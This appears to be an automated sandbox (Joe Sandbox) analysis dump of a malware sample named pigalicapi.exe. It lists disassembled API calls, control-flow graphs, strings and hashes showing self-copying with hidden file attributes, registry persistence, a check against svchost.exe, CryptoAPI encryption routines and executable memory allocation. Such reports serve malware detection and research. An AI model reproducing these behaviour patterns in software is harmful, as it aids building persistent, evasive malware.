                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: lstrlenA.KERNEL32(Gyifczkhyzuai), ref: 00A15AAE
                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: lstrcatA.KERNEL32(00000000,Gyifczkhyzuai), ref: 00A15AC8
                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00A15B00
                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: RegCloseKey.KERNEL32(00000000), ref: 00A15B0E
                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: lstrlenA.KERNEL32(00000000), ref: 00A15B3B
                                                                                                                                                                                                                                                            • Part of subcall function 00A19400: lstrcpyA.KERNEL32(?,00000000), ref: 00A19513
                                                                                                                                                                                                                                                            • Part of subcall function 00A19400: CharUpperA.USER32(?), ref: 00A19521
                                                                                                                                                                                                                                                            • Part of subcall function 00A199F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 00A19A0A
                                                                                                                                                                                                                                                            • Part of subcall function 00A199F0: OpenProcessToken.ADVAPI32(00000000), ref: 00A19A11
                                                                                                                                                                                                                                                            • Part of subcall function 00A199F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00A19A3A
                                                                                                                                                                                                                                                            • Part of subcall function 00A199F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 00A19A77
                                                                                                                                                                                                                                                            • Part of subcall function 00A199F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 00A19AAD
                                                                                                                                                                                                                                                            • Part of subcall function 00A199F0: EqualSid.ADVAPI32(?,00000000), ref: 00A19AC3
                                                                                                                                                                                                                                                            • Part of subcall function 00A16060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00A16082
                                                                                                                                                                                                                                                            • Part of subcall function 00A15E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,00A13BEB), ref: 00A15E0C
                                                                                                                                                                                                                                                            • Part of subcall function 00A15E00: GetLastError.KERNEL32(?,00A13BEB), ref: 00A15E12
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 00A13BFA
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: lstrlenA.KERNEL32(00000000), ref: 00A11148
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: lstrlenA.KERNEL32(00000000), ref: 00A1115A
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 00A11182
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: wnsprintfA.SHLWAPI ref: 00A111BD
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: lstrcmpiA.KERNEL32(00000104,?), ref: 00A111D1
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 00A111F0
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: SetFileAttributesA.KERNEL32(?,00000006), ref: 00A111FF
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: lstrcpyA.KERNEL32(00000104,?), ref: 00A11210
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: lstrcpyA.KERNEL32(00000000,?), ref: 00A11249
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 00A1125D
                                                                                                                                                                                                                                                            • Part of subcall function 00A11120: CreateThread.KERNEL32(00000000,00000000,00A112D0,00000000,00000000,00000000), ref: 00A11274
                                                                                                                                                                                                                                                            • Part of subcall function 00A15E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 00A15E7E
                                                                                                                                                                                                                                                            • Part of subcall function 00A15E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 00A15EB2
                                                                                                                                                                                                                                                            • Part of subcall function 00A15E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 00A15ED6
                                                                                                                                                                                                                                                            • Part of subcall function 00A15E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00A15F0B
                                                                                                                                                                                                                                                            • Part of subcall function 00A15E30: RegCloseKey.KERNEL32(00000000), ref: 00A15F19
                                                                                                                                                                                                                                                            • Part of subcall function 00A16CF0: RegOpenKeyExA.KERNEL32(80000001,00A23B88,00000000,000F003F,00000000), ref: 00A16D30
                                                                                                                                                                                                                                                            • Part of subcall function 00A16CF0: RegQueryValueExA.KERNEL32(00000000,00A23FA6,00000000,00000003,?,00000020), ref: 00A16D61
                                                                                                                                                                                                                                                            • Part of subcall function 00A16CF0: RegDeleteValueA.ADVAPI32(00000000,00A23FA6), ref: 00A16D7E
                                                                                                                                                                                                                                                            • Part of subcall function 00A16CF0: RegCloseKey.ADVAPI32(00000000), ref: 00A16D88
                                                                                                                                                                                                                                                            • Part of subcall function 00A15F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 00A15F67
                                                                                                                                                                                                                                                            • Part of subcall function 00A15F30: lstrcatA.KERNEL32(?,00A23FE2), ref: 00A15F7A
                                                                                                                                                                                                                                                            • Part of subcall function 00A15F30: RegOpenKeyExA.ADVAPI32(80000001,00A13C58,00000000,000F003F,00000000), ref: 00A15FB3
                                                                                                                                                                                                                                                            • Part of subcall function 00A15F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 00A15FF2
                                                                                                                                                                                                                                                            • Part of subcall function 00A15F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00A1603B
                                                                                                                                                                                                                                                            • Part of subcall function 00A15F30: RegCloseKey.ADVAPI32(00000000), ref: 00A16045
                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 00A13C85
                                                                                                                                                                                                                                                            • Part of subcall function 00A14020: InitializeCriticalSection.KERNEL32(?), ref: 00A14066
                                                                                                                                                                                                                                                            • Part of subcall function 00A14020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A1407A
                                                                                                                                                                                                                                                            • Part of subcall function 00A14020: EnterCriticalSection.KERNEL32(?,?), ref: 00A140AF
                                                                                                                                                                                                                                                            • Part of subcall function 00A14020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A140C6
                                                                                                                                                                                                                                                            • Part of subcall function 00A14020: TerminateThread.KERNEL32(00000000,00000000), ref: 00A140E6
                                                                                                                                                                                                                                                            • Part of subcall function 00A14020: ResetEvent.KERNEL32(00000000), ref: 00A140F7
                                                                                                                                                                                                                                                            • Part of subcall function 00A14020: LeaveCriticalSection.KERNEL32(?), ref: 00A14101
                                                                                                                                                                                                                                                            • Part of subcall function 00A14020: CreateThread.KERNEL32(00000000,00000000,00A14AC0,00000000,00000000,00000000), ref: 00A14118
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A13F70
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 00A13FF4
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                          • String ID: Balucergobw$C:\Users\user\pigalicapi.exe$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                          • API String ID: 1389186475-393868559
                                                                                                                                                                                                                                                          • Opcode ID: 12faefc0ed7eed0973964619377cb0d235e111154b5c64eb963da829447e2870
                                                                                                                                                                                                                                                          • Instruction ID: c7d12212c5cfff01c4aec9dba21a8c95cd25487fea390e4aee7dce6e45dec342
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12faefc0ed7eed0973964619377cb0d235e111154b5c64eb963da829447e2870
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4C11AB1D44364AAEB34DBA8AC4ABFA77B56B19700F0440F8F1486A1D2DB744BC6CF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 744 a18800-a18811 745 a18817-a1881b 744->745 746 a1895c-a18962 744->746 745->746 747 a18821-a18843 CryptAcquireContextA 745->747 748 a18845-a18855 GetLastError 747->748 749 a1887a-a1887e 747->749 750 a18860-a18874 CryptAcquireContextA 748->750 751 a18857-a1885e 748->751 749->746 752 a18884-a188b7 CryptGenKey 749->752 750->749 751->749 751->750 753 a18950-a18956 CryptReleaseContext 752->753 754 a188bd-a188d7 CryptExportKey 752->754 753->746 755 a18946-a1894a CryptDestroyKey 754->755 756 a188d9-a188dd 754->756 755->753 757 a1893f 756->757 758 a188df-a188e3 756->758 757->755 758->757 759 a188e5-a188e9 758->759 759->757 760 a188eb-a188ef 759->760 760->757 761 a188f1-a18914 CryptImportKey 760->761 762 a18916-a18937 CryptExportKey CryptDestroyKey 761->762 763 a1893d 761->763 762->763 763->755
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00A18420,00000000,00001000,00000000), ref: 00A1883B
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A18845
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18874
                                                                                                                                                                                                                                                          • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 00A188AF
                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 00A188CF
                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 00A1890C
                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 00A1892A
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 00A18937
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00A1894A
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18956
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A1882C
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A18864
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 125f1dbdf824c754bd670361fc06fa2c9936f936ac4cb770ed9aa2d214b8f9ce
                                                                                                                                                                                                                                                          • Instruction ID: 509df789df4360ea466cb3c00b1df5fb0b1e54d1c7141dcce50b787f36d3bbc8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 125f1dbdf824c754bd670361fc06fa2c9936f936ac4cb770ed9aa2d214b8f9ce
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B412A71A40209EFEB14CFE4C849BFE77B8BB48704F108508F611A7280DBB89A85CF91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 783 a18bb0-a18bc1 784 a18ce7-a18ced 783->784 785 a18bc7-a18bcb 783->785 785->784 786 a18bd1-a18bd5 785->786 786->784 787 a18bdb-a18bdf 786->787 787->784 788 a18be5-a18c07 CryptAcquireContextA 787->788 789 a18c09-a18c19 GetLastError 788->789 790 a18c3e-a18c42 788->790 791 a18c24-a18c38 CryptAcquireContextA 789->791 792 a18c1b-a18c22 789->792 790->784 793 a18c48-a18c61 CryptCreateHash 790->793 791->790 792->790 792->791 794 a18c63-a18c79 CryptHashData 793->794 795 a18cdb-a18ce1 CryptReleaseContext 793->795 796 a18cd1-a18cd5 CryptDestroyHash 794->796 797 a18c7b-a18ca1 CryptGetHashParam 794->797 795->784 796->795 797->796 798 a18ca3-a18ca9 797->798 798->796 799 a18cab-a18cc9 CryptGetHashParam 798->799 799->796 800 a18ccb-a18cce 799->800 800->796
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A18BFF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A18C09
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18C38
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00A18C59
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00A18C71
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 00A18C99
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00A18CC1
                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 00A18CD5
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18CE1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A18C28
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A18BF0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 96661753553b40a4572f8adf39bc7c8a567694f40dea14fde6d9544877387d48
                                                                                                                                                                                                                                                          • Instruction ID: e722be54dfdd11faae41808dc4c20844751f95ac0b8791167f66a972697fd1f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96661753553b40a4572f8adf39bc7c8a567694f40dea14fde6d9544877387d48
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2411D71A41209EBDB14DFD4CC89BEF77B9BB48701F148519F601A6180DBBC9A85CFA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A18AD3
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A18ADD
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18B0C
                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 00A18B37
                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A18B5E
                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00A18B7A
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00A18B87
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00A18B91
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18B9D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A18AFC
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A18AC4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 0a78d9874a1b23275053fa44eab24e229b6a47434a139ca0356ba5ced8c53299
                                                                                                                                                                                                                                                          • Instruction ID: 11878331afe7d251b17a65ac7717a2778b2a0c8e28bab5ef93f9c22ee55eeecd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a78d9874a1b23275053fa44eab24e229b6a47434a139ca0356ba5ced8c53299
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32310AB1A44209EBDF14CFD4DC49FEE77B9BB48705F148518F501A6190DBB89A81CFA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00A148EB
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 00A1490B
                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 00A1493C
                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 00A1496F
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00A14982
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 00A149A9
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 00A149CC
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 00A14A07
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00A14A34
                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 00A14A7D
                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 00A14A8A
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A14AA5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2727466597-0
                                                                                                                                                                                                                                                          • Opcode ID: 036336bf104c3a3727063b9e8005f17b1838ac330fba010baf3b39c0c8229389
                                                                                                                                                                                                                                                          • Instruction ID: 9c567ab2d48321b45cf23461212f37d8350520e7f52331e97fe664f042a64c4f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 036336bf104c3a3727063b9e8005f17b1838ac330fba010baf3b39c0c8229389
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1511F71A80318ABDB25CB94CC55FEA777DAF4CB50F0081D8F609A6180DB759B85CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A189BF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A189C9
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A189F8
                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A18A1F
                                                                                                                                                                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00A18A41
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00A18A4E
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18A5A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A189B0
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A189E8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 6521a55ecbeb01feee741d47e7b72167a72a2ba5b72ee271ef0919e04d45c3d7
                                                                                                                                                                                                                                                          • Instruction ID: 703e875a48c50ac68e66d67506fbda6b474f14eca99f410a987478aeec0741ea
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6521a55ecbeb01feee741d47e7b72167a72a2ba5b72ee271ef0919e04d45c3d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54310F75A80208FFDB24CFE4CC49BEE77B9BB48711F148559F505AB290DBB89A81CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 009D6221
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,0063F02F,00003000,00000040), ref: 009D6289
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 009D6350
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743577244.00000000009D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D6000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_9d6000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual$LibraryLoad
                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l$lloc
                                                                                                                                                                                                                                                          • API String ID: 2441068224-1161241244
                                                                                                                                                                                                                                                          • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                                                                                                                                                                                                                                          • Instruction ID: 822c2ee1573d7c980ecdfd5077a6a453797fea34304b86ad671a34380f36ae96
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 342248B1E402199FDB14CF99C884BAEBBB9FF48314F24816AE915AB345D770E940CF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000040), ref: 0056129B
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00561343
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocErrorLastVirtual
                                                                                                                                                                                                                                                          • String ID: xnZ
                                                                                                                                                                                                                                                          • API String ID: 497505419-3580042809
                                                                                                                                                                                                                                                          • Opcode ID: a1fe61c7b6643fc9d0d4fb676b96b85e6eda4f761e654fa1c214631b524a6987
                                                                                                                                                                                                                                                          • Instruction ID: 428003034a58f147c59b83d7f2e4a293c3534b6fdbdea34e6e25d80bed651fa8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1fe61c7b6643fc9d0d4fb676b96b85e6eda4f761e654fa1c214631b524a6987
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51517B75204601DFD714CF68D885EABBBF9FB88304F088A6DE54ACB691DB30E845CB65
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00A197A0: GetProcessHeap.KERNEL32(00000008,00A19FB2,?,00A19FB2,00000000,?,?,?,00A19E2D), ref: 00A197A9
                                                                                                                                                                                                                                                            • Part of subcall function 00A197A0: RtlAllocateHeap.NTDLL(00000000,?,00A19FB2,00000000,?,?,?,00A19E2D), ref: 00A197B0
                                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,00A19E2D), ref: 00A19FEB
                                                                                                                                                                                                                                                          Memory Dump Source
